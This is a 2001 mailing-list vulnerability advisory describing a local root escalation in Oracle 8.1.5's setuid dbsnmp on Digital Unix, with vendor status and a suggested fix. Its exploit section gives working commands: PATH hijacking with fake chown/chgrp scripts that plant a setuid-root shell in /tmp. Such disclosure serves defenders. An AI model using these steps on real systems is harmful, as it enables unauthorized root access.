Oracle 8.1.5 dbnsmp vulnerability

From: Ismael Briones (ismael@el-mundo.net)
Date: Wed Aug 01 2001 - 10:14:07 PDT

    Title:         Vulnerability in dbsnmp in Oracle 8.1.5
    Date:        01-08-2001
    Platform:   Only tested in Digital Unix.
    Impact:     Any user can gain root privileges
    Author:     Ismael Briones Vilar (ismael@el-mundo.net)

    PROBLEM SUMMARY:

        There is a problem in dbsnmp that can be used by local users to obtain
    root privileges. The dbsnmp is setuid root. When a user execute dbsnmp there
    is a call to chown and chgrp, but without especify the path, so any user can
    define his PATH variable to exploit this vulnerability:

         Probed in Oracle 8.1.5.
         Oracle 8.1.6 is not vulnerable

    IMPACT:

       Any user with local access, can gain root privileges

    SOLUTION:

       Maybe a chmod -s

    STATUS:

       Vendor was contacted 30/07/2001 and Oracle answer:

    	"We are investigating a fix as we speak."

    EXPLOIT:

    export PATH=~/bin/:$PATH

    Then we create the file ~/bin/chown or ~/bin/chgrp:

    #!/bin/sh
    cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX

    (We have to put all in the same line, separated by semicolon)

    We make our chown or chgrp executable:

    chmod +x  ~/bin/chown

    chmod +x  ~/bin/chgrp

    When the user execute dbsnmp, the system look for chown in the first
    directory of the PATH variable, execute our chown file and whe have a shell
    setuid root in /tmp/XXX.

            Ismael Briones Vilar
            ismael@el-mundo.net